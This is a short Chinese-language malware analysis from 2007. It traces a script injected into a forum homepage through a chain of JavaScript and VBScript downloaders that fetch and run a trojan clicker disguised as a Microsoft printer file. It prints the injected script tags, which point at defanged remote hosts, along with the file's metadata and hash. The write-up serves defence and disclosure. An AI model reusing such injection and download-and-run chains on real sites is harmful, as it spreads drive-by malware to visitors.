endurer 原创
2007-02-01 第1版
论坛首页被加入代码:
/------
<script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"></script>
------/
m***d5.asp?ad*=1**** 中发现代码:
/------
document.write("<script language=/"javascript/" src=/"hxxp://www.cnfish.com/editor/htmleditor/images/WINPNT.JS/"></script>");
------/
WINPNT.JS 中发现JavaScript脚本程序,功能是输出一段VBScript脚本程序。
该VBScript脚本程序的功能是调用自定义函数r(k)来解密用~分隔的数字字符串并执行,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 从另一网站hxxp://www.c***nfi**sh**.com.**/下载文件WINPNT.VBS,保存为%temp%/WINPNT.VBS,利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
WINPNT.VBS 包含VBScript脚本程序,下载文件WINPNT.EXE,保存为%temp%/WINPNT.EXE,使用 Wscript.Sleep 让脚本暂停5 秒(5000 毫秒),再利用Wscript.Shell 对象Shell 的 run 方法 来运行。
WINPNT.EXE 采用 VB 编写,ASPack 2.12 -> Alexey Solodovnikov 加壳。
/----
文件说明符 : D:/test/WINPNT.EXE
属性 : A---
语言 : 中文(中国)
文件版本 : 5.2600.2180
说明 : Microsoft Internet Explorer
版权 : C) Microsoft Corporation. All rights reserved.
备注 : Microsoft Windows Printer
产品版本 : 5.2600.2180
产品名称 : Microsoft Windows Printer
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINPNT
源文件名 : WINPNT.EXE
创建时间 : 2007-1-31 21:26:56
修改时间 : 2007-1-31 21:26:58
访问时间 : 2007-1-31 0:0:0
大小 : 23552 字节 23.0 KB
MD5 : 5c7ced24b750740ca747d943feb11c1c
----/
Kaspersky 报为:Trojan-clicker.Win32.VB.qq
这东东会
在注册表run键下创建启动项
内置了一批广告网址列表,随机弹出广告窗口
似乎有在线升级或下载文件功能
